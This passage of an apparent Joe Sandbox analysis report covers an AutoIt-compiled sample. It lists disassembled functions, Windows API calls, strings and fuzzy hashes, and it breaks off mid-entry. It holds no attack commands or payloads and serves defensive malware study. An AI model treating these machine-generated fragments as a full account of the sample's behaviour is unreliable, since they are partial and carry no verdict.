                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00344C8D
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                          • String ID:
                                                          • API String ID: 1986165174-0
                                                          • Opcode ID: 179a49b4cced18c7021549c793c6275b6fd593ee61e872a03d384507731ca013
                                                          • Instruction ID: 51807e5814f1237b51d951e96c3b3c5cf7ba45592250e68da56d3b259c18dccf
                                                          • Opcode Fuzzy Hash: 179a49b4cced18c7021549c793c6275b6fd593ee61e872a03d384507731ca013
                                                          • Instruction Fuzzy Hash: F391D63154A7C0DEC733CB6885916AAFFF5AF25300B4989ADD0CB9BB01D224F908D759
                                                          Function 0034E800 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Dd@$Dd@$Dd@$Dd@$Variable must be of type 'Object'.
                                                          • API String ID: 0-2845646731
                                                          • Opcode ID: b8ae384c267169d1401e51ab197fd2af30e8bb873d220af694dd44c98aa02fce
                                                          • Instruction ID: c27174281d0a38f1f62615605dd927e96f90f3155975c06d6a89c8008a42584d
                                                          • Opcode Fuzzy Hash: b8ae384c267169d1401e51ab197fd2af30e8bb873d220af694dd44c98aa02fce
                                                          • Instruction Fuzzy Hash: 85A27874A04215CFCB26DF58C480AAAB7F5FF58304F2A8569E906AF351D775BD82CB80
                                                          Function 003A449B Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,0037E6F1), ref: 003A44AB
                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 003A44BC
                                                          • FindClose.KERNEL32(00000000), ref: 003A44CC
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FileFind$AttributesCloseFirst
                                                          • String ID:
                                                          • API String ID: 48322524-0
                                                          • Opcode ID: 321a08201eea30abc9f308c6d3b7d613a0e5e02e0b9c4eb4d9539a13300a37d8
                                                          • Instruction ID: 2da4b07eeccecd2252f366870e4614515e26de1c0a88a8156f4a565de6a1075d
                                                          • Opcode Fuzzy Hash: 321a08201eea30abc9f308c6d3b7d613a0e5e02e0b9c4eb4d9539a13300a37d8
                                                          • Instruction Fuzzy Hash: 0AE020358104006F9611A738EC0DCE9775DEE4A335F104B15F935C10D0E7B46D1087D5
                                                          Function 00350B30 Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00350BBB
                                                          • timeGetTime.WINMM ref: 00350E76
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00350FB3
                                                          • Sleep.KERNEL32(0000000A), ref: 00350FC1
                                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 0035105A
                                                          • DestroyWindow.USER32 ref: 00351066
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00351080
                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 003851DC
                                                          • TranslateMessage.USER32(?), ref: 00385FB9
                                                          • DispatchMessageW.USER32(?), ref: 00385FC7
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00385FDB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pb@$pb@$pb@$pb@
                                                          • API String ID: 4212290369-4030950617
                                                          • Opcode ID: 1e7b91ae8a1fb9d84c42458bb64ad2585985846c8adb1fd58792aa482b9e851f
                                                          • Instruction ID: fb5ae2492d36e8d851f3d6dd567bb9131013ed23e494d4c049864a7ef6165e2b
                                                          • Opcode Fuzzy Hash: 1e7b91ae8a1fb9d84c42458bb64ad2585985846c8adb1fd58792aa482b9e851f
                                                          • Instruction Fuzzy Hash: DDB2D570608741DFD72ADF24C885FAAB7E5BF84304F15495DE88A9B2A1D771E848CB82
                                                          Function 003A91FE Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 003A9008: __time64.LIBCMT ref: 003A9012
                                                            • Part of subcall function 00345045: _fseek.LIBCMT ref: 0034505D
                                                          • __wsplitpath.LIBCMT ref: 003A92DD
                                                            • Part of subcall function 0036426E: __wsplitpath_helper.LIBCMT ref: 003642AE
                                                          • _wcscpy.LIBCMT ref: 003A92F0
                                                          • _wcscat.LIBCMT ref: 003A9303
                                                          • __wsplitpath.LIBCMT ref: 003A9328
                                                          • _wcscat.LIBCMT ref: 003A933E
                                                          • _wcscat.LIBCMT ref: 003A9351
                                                            • Part of subcall function 003A904E: _memmove.LIBCMT ref: 003A9087
                                                            • Part of subcall function 003A904E: _memmove.LIBCMT ref: 003A9096
                                                          • _wcscmp.LIBCMT ref: 003A9298
                                                            • Part of subcall function 003A97DD: _wcscmp.LIBCMT ref: 003A98CD
                                                            • Part of subcall function 003A97DD: _wcscmp.LIBCMT ref: 003A98E0
                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003A94FB
                                                          • _wcsncpy.LIBCMT ref: 003A956E
                                                          • DeleteFileW.KERNEL32(?,?), ref: 003A95A4
                                                          • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003A95BA
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A95CB
                                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 003A95DD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                          • String ID:
                                                          • API String ID: 1500180987-0
                                                          • Opcode ID: 67b01302743c10a2aede3240a7624ffd23a2ea0b438124badf2813f46b5909da
                                                          • Instruction ID: 966e68704ef3f7ab7dd0aad62a7931eb146400f7673f335cdcc7fd1d730d1b3c
                                                          • Opcode Fuzzy Hash: 67b01302743c10a2aede3240a7624ffd23a2ea0b438124badf2813f46b5909da
                                                          • Instruction Fuzzy Hash: 28C12BB5D00219ABCF22DF95CC85EDEBBBDEF45310F0040AAF609EA151DB709A448F65
                                                          Function 00343023 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68windowregistryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00343074
                                                          • RegisterClassExW.USER32(00000030), ref: 0034309E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003430AF
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 003430CC
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003430DC
                                                          • LoadIconW.USER32(000000A9), ref: 003430F2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00343101
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 2738926f324b65414a2fff399fd7bafd7e23d53f19daa300c11f1cc46811df1e
                                                          • Instruction ID: b5f68727ae32ccacb3319ed14c457dc15ec9827ccda78aec469d3d3f416cbd94
                                                          • Opcode Fuzzy Hash: 2738926f324b65414a2fff399fd7bafd7e23d53f19daa300c11f1cc46811df1e
                                                          • Instruction Fuzzy Hash: 813148B2800309AFDB419FA4D888ADEBBF5FB09310F10812AE980E62A0D3B51550CF55
                                                          Function 00343041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00343074
                                                          • RegisterClassExW.USER32(00000030), ref: 0034309E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003430AF
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 003430CC
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003430DC
                                                          • LoadIconW.USER32(000000A9), ref: 003430F2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00343101
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 5d8a3ff9f714d074fd46a6d4e2476a310b4eeeb97434b380332f757179bb25bf
                                                          • Instruction ID: 6786a2aae98f86858b020351409db048cba1b9126dc7bc679877eb2932daf379
                                                          • Opcode Fuzzy Hash: 5d8a3ff9f714d074fd46a6d4e2476a310b4eeeb97434b380332f757179bb25bf
                                                          • Instruction Fuzzy Hash: 5A21C7B6901718AFDB01EFA4ED49BDEBBF9FB08700F00812AF911E62A0D7B155548F95
                                                          Function 003471EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00344864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004052F8,?,003437C0,?), ref: 00344882
                                                            • Part of subcall function 0036068B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,003472C5), ref: 003606AD
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00347308
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0037EC21
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0037EC62
                                                          • RegCloseKey.ADVAPI32(?), ref: 0037ECA0
                                                          • _wcscat.LIBCMT ref: 0037ECF9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                          • API String ID: 2673923337-2727554177
                                                          • Opcode ID: 3b8cfc16117c671ffc44bd47d4d85c14b4323ba3961f5b2cd678407bdc54f2e2
                                                          • Instruction ID: 6c0ffb134121eb197a6c7b524966d79ececc9e69d9eb2b2571f8eb8670409fab
                                                          • Opcode Fuzzy Hash: 3b8cfc16117c671ffc44bd47d4d85c14b4323ba3961f5b2cd678407bdc54f2e2
                                                          • Instruction Fuzzy Hash: 0271AF714093019EC316EF25ED8189BBBE8FF88350F41497EF446EB1A0DB70A958CB95
                                                          Function 00343633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 760 343633-343681 762 3436e1-3436e3 760->762 763 343683-343686 760->763 762->763 766 3436e5 762->766 764 3436e7 763->764 765 343688-34368f 763->765 770 3436ed-3436f0 764->770 771 37d24c-37d27a call 3511d0 call 3511f3 764->771 767 343695-34369a 765->767 768 34375d-343765 PostQuitMessage 765->768 769 3436ca-3436d2 DefWindowProcW 766->769 772 3436a0-3436a2 767->772 773 37d2bf-37d2d3 call 3a281f 767->773 776 343711-343713 768->776 775 3436d8-3436de 769->775 777 343715-34373c SetTimer RegisterWindowMessageW 770->777 778 3436f2-3436f3 770->778 807 37d27f-37d286 771->807 779 343767-343776 call 344531 772->779 780 3436a8-3436ad 772->780 773->776 799 37d2d9 773->799 776->775 777->776 781 34373e-343749 CreatePopupMenu I_RpcFreeBuffer 777->781 784 37d1ef-37d1f2 778->784 785 3436f9-34370c KillTimer call 3444cb call 343114 778->785 779->776 787 37d2a4-37d2ab 780->787 788 3436b3-3436b8 780->788 789 34374b-34375b call 3445df 781->789 793 37d1f4-37d1f6 784->793 794 37d228-37d247 MoveWindow 784->794 785->776 787->769 796 37d2b1-37d2ba call 397f5e 787->796 788->789 797 3436be-3436c4 788->797 789->776 802 37d217-37d223 SetFocus 793->802 803 37d1f8-37d1fb 793->803 794->776 796->769 797->769 797->807 799->769 802->776 803->797 804 37d201-37d212 call 3511d0 803->804 804->776 807->769 811 37d28c-37d29f call 3444cb call 3443db 807->811 811->769
                                                          APIs
                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 003436D2
                                                          • KillTimer.USER32(?,00000001), ref: 003436FC
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0034371F
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0034372A
                                                          • CreatePopupMenu.USER32 ref: 0034373E
                                                          • PostQuitMessage.USER32(00000000), ref: 0034375F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                          • String ID: TaskbarCreated$%=
                                                          • API String ID: 129472671-273969447
                                                          • Opcode ID: e04cfd2a28fa16bb30b8295fddf24a61856be4fa4d4b794b74af01336d75f1b2
                                                          • Instruction ID: e1f9b9c28e5dd6258b65386e91a878a1f57b59d30e338d749aaa871b10b2950f
                                                          • Opcode Fuzzy Hash: e04cfd2a28fa16bb30b8295fddf24a61856be4fa4d4b794b74af01336d75f1b2
                                                          • Instruction Fuzzy Hash: E84138B2100506ABDF176F24DD49B7A3BD9EB00340F164139F902EF2A2CA78BE109B65
                                                          Function 00343A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00343A62
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00343A71
                                                          • LoadIconW.USER32(00000063), ref: 00343A88
                                                          • LoadIconW.USER32(000000A4), ref: 00343A9A
                                                          • LoadIconW.USER32(000000A2), ref: 00343AAC
                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00343AD2
                                                          • RegisterClassExW.USER32(?), ref: 00343B28
                                                            • Part of subcall function 00343041: GetSysColorBrush.USER32(0000000F), ref: 00343074
                                                            • Part of subcall function 00343041: RegisterClassExW.USER32(00000030), ref: 0034309E
                                                            • Part of subcall function 00343041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003430AF
                                                            • Part of subcall function 00343041: InitCommonControlsEx.COMCTL32(?), ref: 003430CC
                                                            • Part of subcall function 00343041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003430DC
                                                            • Part of subcall function 00343041: LoadIconW.USER32(000000A9), ref: 003430F2
                                                            • Part of subcall function 00343041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00343101
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                          • String ID: #$0$AutoIt v3
                                                          • API String ID: 423443420-4155596026
                                                          • Opcode ID: f6d95a2884ccdef645326f070bc1bc92b648e3b422d36e84e65d8d8cd157c122
                                                          • Instruction ID: ce0bf8a9837475377d76a134b975d161a894a3eef860f1c08f12a387609a8346
                                                          • Opcode Fuzzy Hash: f6d95a2884ccdef645326f070bc1bc92b648e3b422d36e84e65d8d8cd157c122
                                                          • Instruction Fuzzy Hash: 95213974910308EFEB11DFA4EE09B9E7FF5EB08711F00016AE504BA2A1D3B566508F88
                                                          Function 00343778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R@
                                                          • API String ID: 1825951767-3808460316
                                                          • Opcode ID: 6bcd42f591988631099c485afcb14939d23a8e28c2a1b11bcc6edf83428ee21f
                                                          • Instruction ID: 34ceca09aecce96ca516d573303ff180aa8beb13a1fc70ae3a4a728da1d7cda3
                                                          • Opcode Fuzzy Hash: 6bcd42f591988631099c485afcb14939d23a8e28c2a1b11bcc6edf83428ee21f
                                                          • Instruction Fuzzy Hash: 56A142768112199ADF16EBA0CC96EEEB7B8FF14300F44442AF416BF191DF756A09CB60
                                                          Function 0034F8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 003602E2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00360313
                                                            • Part of subcall function 003602E2: MapVirtualKeyW.USER32(00000010,00000000), ref: 0036031B
                                                            • Part of subcall function 003602E2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00360326
                                                            • Part of subcall function 003602E2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00360331
                                                            • Part of subcall function 003602E2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00360339
                                                            • Part of subcall function 003602E2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00360341
                                                            • Part of subcall function 00356259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0034FA90), ref: 003562B4
                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0034FB2D
                                                          • OleInitialize.OLE32(00000000), ref: 0034FBAA
                                                          • CloseHandle.KERNEL32(00000000), ref: 00384921
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                          • String ID: <W@$\T@$%=$S@
                                                          • API String ID: 1986988660-3831757665
                                                          • Opcode ID: f227eb1154d3664fa5d31c73ee641d61c9210437c7975db4c1a229facfb4a90d
                                                          • Instruction ID: 17598c15472027f5dbbf4bb0b39b9d81682bf663f2ed53310292458533ba81eb
                                                          • Opcode Fuzzy Hash: f227eb1154d3664fa5d31c73ee641d61c9210437c7975db4c1a229facfb4a90d
                                                          • Instruction Fuzzy Hash: A981B0B0911A408FC785EF39AE4979B7BE5FB88306750813AD419EB272EB744884CF1D
                                                          Function 024E25F0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
